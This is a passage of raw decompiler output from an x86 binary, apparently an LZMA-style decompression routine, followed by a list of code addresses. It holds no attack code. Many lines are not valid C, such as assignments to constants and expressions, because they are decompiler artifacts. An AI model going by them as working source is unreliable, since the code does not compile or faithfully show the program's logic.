                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                												__ecx =  *(__ebp - 0x3c);
                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                												__ecx =  *(__ebp - 4);
                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                												__eflags =  *(__ebp - 0x38) - 4;
                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                												if( *(__ebp - 0x38) >= 4) {
                													__eflags =  *(__ebp - 0x38) - 0xa;
                													if( *(__ebp - 0x38) >= 0xa) {
                														_t98 = __ebp - 0x38;
                														 *_t98 =  *(__ebp - 0x38) - 6;
                														__eflags =  *_t98;
                													} else {
                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                													}
                												} else {
                													 *(__ebp - 0x38) = 0;
                												}
                												__eflags =  *(__ebp - 0x34) - __edx;
                												if( *(__ebp - 0x34) == __edx) {
                													__ebx = 0;
                													__ebx = 1;
                													goto L61;
                												} else {
                													__eax =  *(__ebp - 0x14);
                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                													__eflags = __eax -  *(__ebp - 0x74);
                													if(__eax >=  *(__ebp - 0x74)) {
                														__eax = __eax +  *(__ebp - 0x74);
                														__eflags = __eax;
                													}
                													__ecx =  *(__ebp - 8);
                													__ebx = 0;
                													__ebx = 1;
                													__al =  *((intOrPtr*)(__eax + __ecx));
                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                													goto L41;
                												}
                											case 7:
                												__eflags =  *(__ebp - 0x40) - 1;
                												if( *(__ebp - 0x40) != 1) {
                													__eax =  *(__ebp - 0x24);
                													 *(__ebp - 0x80) = 0x16;
                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                													__eax =  *(__ebp - 0x28);
                													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                													__eax =  *(__ebp - 0x2c);
                													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                													__eax = 0;
                													__eflags =  *(__ebp - 0x38) - 7;
                													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                													__al = __al & 0x000000fd;
                													__eax = (__eflags >= 0) - 1 + 0xa;
                													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                													__eax =  *(__ebp - 4);
                													__eax =  *(__ebp - 4) + 0x664;
                													__eflags = __eax;
                													 *(__ebp - 0x58) = __eax;
                													goto L69;
                												}
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 8;
                												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                												while(1) {
                													L132:
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											case 8:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x84) = 0xa;
                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                												} else {
                													__eax =  *(__ebp - 0x38);
                													__ecx =  *(__ebp - 4);
                													__eax =  *(__ebp - 0x38) + 0xf;
                													 *(__ebp - 0x84) = 9;
                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                												}
                												while(1) {
                													L132:
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											case 9:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													goto L89;
                												}
                												__eflags =  *(__ebp - 0x60);
                												if( *(__ebp - 0x60) == 0) {
                													goto L171;
                												}
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                												__eflags = _t259;
                												0 | _t259 = _t259 + _t259 + 9;
                												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                												goto L76;
                											case 0xa:
                												goto L0;
                											case 0xb:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__ecx =  *(__ebp - 0x24);
                													__eax =  *(__ebp - 0x20);
                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												} else {
                													__eax =  *(__ebp - 0x24);
                												}
                												__ecx =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												goto L88;
                											case 0xc:
                												L99:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xc;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t334 = __ebp - 0x70;
                												 *_t334 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t334;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												__eax =  *(__ebp - 0x2c);
                												goto L101;
                											case 0xd:
                												L37:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xd;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t122 = __ebp - 0x70;
                												 *_t122 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t122;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L39:
                												__eax =  *(__ebp - 0x40);
                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                													goto L48;
                												}
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													goto L54;
                												}
                												L41:
                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                												__ecx =  *(__ebp - 0x58);
                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                												 *(__ebp - 0x48) = __eax;
                												__eax = __eax + 1;
                												__eax = __eax << 8;
                												__eax = __eax + __ebx;
                												__esi =  *(__ebp - 0x58) + __eax * 2;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edx = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													 *(__ebp - 0x40) = 1;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													__ebx = __ebx + __ebx + 1;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edx;
                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L39;
                												} else {
                													goto L37;
                												}
                											case 0xe:
                												L46:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xe;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t156 = __ebp - 0x70;
                												 *_t156 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t156;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												while(1) {
                													L48:
                													__eflags = __ebx - 0x100;
                													if(__ebx >= 0x100) {
                														break;
                													}
                													__eax =  *(__ebp - 0x58);
                													__edx = __ebx + __ebx;
                													__ecx =  *(__ebp - 0x10);
                													__esi = __edx + __eax;
                													__ecx =  *(__ebp - 0x10) >> 0xb;
                													__ax =  *__esi;
                													 *(__ebp - 0x54) = __esi;
                													__edi = __ax & 0x0000ffff;
                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                													__eflags =  *(__ebp - 0xc) - __ecx;
                													if( *(__ebp - 0xc) >= __ecx) {
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                														__cx = __ax;
                														_t170 = __edx + 1; // 0x1
                														__ebx = _t170;
                														__cx = __ax >> 5;
                														__eflags = __eax;
                														 *__esi = __ax;
                													} else {
                														 *(__ebp - 0x10) = __ecx;
                														0x800 = 0x800 - __edi;
                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                														__ebx = __ebx + __ebx;
                														 *__esi = __cx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													 *(__ebp - 0x44) = __ebx;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														continue;
                													} else {
                														goto L46;
                													}
                												}
                												L54:
                												_t173 = __ebp - 0x34;
                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                												__eflags =  *_t173;
                												goto L55;
                											case 0xf:
                												L58:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xf;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t203 = __ebp - 0x70;
                												 *_t203 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t203;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L60:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													L55:
                													__al =  *(__ebp - 0x44);
                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                													goto L56;
                												}
                												L61:
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t217 = __edx + 1; // 0x1
                													__ebx = _t217;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L60;
                												} else {
                													goto L58;
                												}
                											case 0x10:
                												L109:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0x10;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t365 = __ebp - 0x70;
                												 *_t365 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t365;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												goto L111;
                											case 0x11:
                												goto L69;
                											case 0x12:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 0x58);
                													 *(__ebp - 0x84) = 0x13;
                													__esi =  *(__ebp - 0x58) + 2;
                													while(1) {
                														L132:
                														 *(_t613 - 0x54) = _t606;
                														goto L133;
                													}
                												}
                												__eax =  *(__ebp - 0x4c);
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                												__ecx =  *(__ebp - 0x58);
                												__eax =  *(__ebp - 0x4c) << 4;
                												__eflags = __eax;
                												__eax =  *(__ebp - 0x58) + __eax + 4;
                												goto L130;
                											case 0x13:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													_t469 = __ebp - 0x58;
                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                													__eflags =  *_t469;
                													 *(__ebp - 0x30) = 0x10;
                													 *(__ebp - 0x40) = 8;
                													L144:
                													 *(__ebp - 0x7c) = 0x14;
                													goto L145;
                												}
                												__eax =  *(__ebp - 0x4c);
                												__ecx =  *(__ebp - 0x58);
                												__eax =  *(__ebp - 0x4c) << 4;
                												 *(__ebp - 0x30) = 8;
                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                												L130:
                												 *(__ebp - 0x58) = __eax;
                												 *(__ebp - 0x40) = 3;
                												goto L144;
                											case 0x14:
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                												__eax =  *(__ebp - 0x80);
                												 *(_t613 - 0x88) = _t533;
                												goto L1;
                											case 0x15:
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xb;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                												goto L120;
                											case 0x16:
                												__eax =  *(__ebp - 0x30);
                												__eflags = __eax - 4;
                												if(__eax >= 4) {
                													_push(3);
                													_pop(__eax);
                												}
                												__ecx =  *(__ebp - 4);
                												 *(__ebp - 0x40) = 6;
                												__eax = __eax << 7;
                												 *(__ebp - 0x7c) = 0x19;
                												 *(__ebp - 0x58) = __eax;
                												goto L145;
                											case 0x17:
                												L145:
                												__eax =  *(__ebp - 0x40);
                												 *(__ebp - 0x50) = 1;
                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                												goto L149;
                											case 0x18:
                												L146:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0x18;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t484 = __ebp - 0x70;
                												 *_t484 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t484;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L148:
                												_t487 = __ebp - 0x48;
                												 *_t487 =  *(__ebp - 0x48) - 1;
                												__eflags =  *_t487;
                												L149:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													__ecx =  *(__ebp - 0x40);
                													__ebx =  *(__ebp - 0x50);
                													0 = 1;
                													__eax = 1 << __cl;
                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                													__eax =  *(__ebp - 0x7c);
                													 *(__ebp - 0x44) = __ebx;
                													while(1) {
                														 *(_t613 - 0x88) = _t533;
                														goto L1;
                													}
                												}
                												__eax =  *(__ebp - 0x50);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                												__eax =  *(__ebp - 0x58);
                												__esi = __edx + __eax;
                												 *(__ebp - 0x54) = __esi;
                												__ax =  *__esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													__cx = __ax >> 5;
                													__eax = __eax - __ecx;
                													__edx = __edx + 1;
                													__eflags = __edx;
                													 *__esi = __ax;
                													 *(__ebp - 0x50) = __edx;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L148;
                												} else {
                													goto L146;
                												}
                											case 0x19:
                												__eflags = __ebx - 4;
                												if(__ebx < 4) {
                													 *(__ebp - 0x2c) = __ebx;
                													L119:
                													_t393 = __ebp - 0x2c;
                													 *_t393 =  *(__ebp - 0x2c) + 1;
                													__eflags =  *_t393;
                													L120:
                													__eax =  *(__ebp - 0x2c);
                													__eflags = __eax;
                													if(__eax == 0) {
                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                														goto L170;
                													}
                													__eflags = __eax -  *(__ebp - 0x60);
                													if(__eax >  *(__ebp - 0x60)) {
                														goto L171;
                													}
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                													__eax =  *(__ebp - 0x30);
                													_t400 = __ebp - 0x60;
                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                													__eflags =  *_t400;
                													goto L123;
                												}
                												__ecx = __ebx;
                												__eax = __ebx;
                												__ecx = __ebx >> 1;
                												__eax = __ebx & 0x00000001;
                												__ecx = (__ebx >> 1) - 1;
                												__al = __al | 0x00000002;
                												__eax = (__ebx & 0x00000001) << __cl;
                												__eflags = __ebx - 0xe;
                												 *(__ebp - 0x2c) = __eax;
                												if(__ebx >= 0xe) {
                													__ebx = 0;
                													 *(__ebp - 0x48) = __ecx;
                													L102:
                													__eflags =  *(__ebp - 0x48);
                													if( *(__ebp - 0x48) <= 0) {
                														__eax = __eax + __ebx;
                														 *(__ebp - 0x40) = 4;
                														 *(__ebp - 0x2c) = __eax;
                														__eax =  *(__ebp - 4);
                														__eax =  *(__ebp - 4) + 0x644;
                														__eflags = __eax;
                														L108:
                														__ebx = 0;
                														 *(__ebp - 0x58) = __eax;
                														 *(__ebp - 0x50) = 1;
                														 *(__ebp - 0x44) = 0;
                														 *(__ebp - 0x48) = 0;
                														L112:
                														__eax =  *(__ebp - 0x40);
                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                															_t391 = __ebp - 0x2c;
                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                															__eflags =  *_t391;
                															goto L119;
                														}
                														__eax =  *(__ebp - 0x50);
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                														__eax =  *(__ebp - 0x58);
                														__esi = __edi + __eax;
                														 *(__ebp - 0x54) = __esi;
                														__ax =  *__esi;
                														__ecx = __ax & 0x0000ffff;
                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                														__eflags =  *(__ebp - 0xc) - __edx;
                														if( *(__ebp - 0xc) >= __edx) {
                															__ecx = 0;
                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                															__ecx = 1;
                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                															__ebx = 1;
                															__ecx =  *(__ebp - 0x48);
                															__ebx = 1 << __cl;
                															__ecx = 1 << __cl;
                															__ebx =  *(__ebp - 0x44);
                															__ebx =  *(__ebp - 0x44) | __ecx;
                															__cx = __ax;
                															__cx = __ax >> 5;
                															__eax = __eax - __ecx;
                															__edi = __edi + 1;
                															__eflags = __edi;
                															 *(__ebp - 0x44) = __ebx;
                															 *__esi = __ax;
                															 *(__ebp - 0x50) = __edi;
                														} else {
                															 *(__ebp - 0x10) = __edx;
                															0x800 = 0x800 - __ecx;
                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                															 *__esi = __dx;
                														}
                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                														if( *(__ebp - 0x10) >= 0x1000000) {
                															L111:
                															_t368 = __ebp - 0x48;
                															 *_t368 =  *(__ebp - 0x48) + 1;
                															__eflags =  *_t368;
                															goto L112;
                														} else {
                															goto L109;
                														}
                													}
                													__ecx =  *(__ebp - 0xc);
                													__ebx = __ebx + __ebx;
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													 *(__ebp - 0x44) = __ebx;
                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                														__ecx =  *(__ebp - 0x10);
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                														__ebx = __ebx | 0x00000001;
                														__eflags = __ebx;
                														 *(__ebp - 0x44) = __ebx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L101:
                														_t338 = __ebp - 0x48;
                														 *_t338 =  *(__ebp - 0x48) - 1;
                														__eflags =  *_t338;
                														goto L102;
                													} else {
                														goto L99;
                													}
                												}
                												__edx =  *(__ebp - 4);
                												__eax = __eax - __ebx;
                												 *(__ebp - 0x40) = __ecx;
                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                												goto L108;
                											case 0x1a:
                												L56:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													 *(__ebp - 0x88) = 0x1a;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x68);
                												__al =  *(__ebp - 0x5c);
                												__edx =  *(__ebp - 8);
                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *( *(__ebp - 0x68)) = __al;
                												__ecx =  *(__ebp - 0x14);
                												 *(__ecx +  *(__ebp - 8)) = __al;
                												__eax = __ecx + 1;
                												__edx = 0;
                												_t192 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t192;
                												goto L80;
                											case 0x1b:
                												L76:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													 *(__ebp - 0x88) = 0x1b;
                													goto L170;
                												}
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t275 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t275;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												_t284 = __ebp - 0x64;
                												 *_t284 =  *(__ebp - 0x64) - 1;
                												__eflags =  *_t284;
                												 *( *(__ebp - 0x68)) = __cl;
                												L80:
                												 *(__ebp - 0x14) = __edx;
                												goto L81;
                											case 0x1c:
                												while(1) {
                													L123:
                													__eflags =  *(__ebp - 0x64);
                													if( *(__ebp - 0x64) == 0) {
                														break;
                													}
                													__eax =  *(__ebp - 0x14);
                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                													__eflags = __eax -  *(__ebp - 0x74);
                													if(__eax >=  *(__ebp - 0x74)) {
                														__eax = __eax +  *(__ebp - 0x74);
                														__eflags = __eax;
                													}
                													__edx =  *(__ebp - 8);
                													__cl =  *(__eax + __edx);
                													__eax =  *(__ebp - 0x14);
                													 *(__ebp - 0x5c) = __cl;
                													 *(__eax + __edx) = __cl;
                													__eax = __eax + 1;
                													__edx = 0;
                													_t414 = __eax %  *(__ebp - 0x74);
                													__eax = __eax /  *(__ebp - 0x74);
                													__edx = _t414;
                													__eax =  *(__ebp - 0x68);
                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                													__eflags =  *(__ebp - 0x30);
                													 *( *(__ebp - 0x68)) = __cl;
                													 *(__ebp - 0x14) = _t414;
                													if( *(__ebp - 0x30) > 0) {
                														continue;
                													} else {
                														L81:
                														 *(__ebp - 0x88) = 2;
                														goto L1;
                													}
                												}
                												 *(__ebp - 0x88) = 0x1c;
                												goto L170;
                										}
                									}
                									L171:
                									_t535 = _t534 | 0xffffffff;
                									goto L172;
                								}
                							}
                						}
                					}
                					goto L1;
                				}
                			}













                0x0040601f
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040604c
                0x0040604e
                0x00406051
                0x004060c2
                0x004060c5
                0x004060c8
                0x004060cf
                0x004060d9
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x00406053
                0x00406057
                0x0040605a
                0x0040605c
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406074
                0x00406078
                0x0040607f
                0x00406082
                0x00406089
                0x0040608d
                0x00406095
                0x00406095
                0x00406095
                0x0040608f
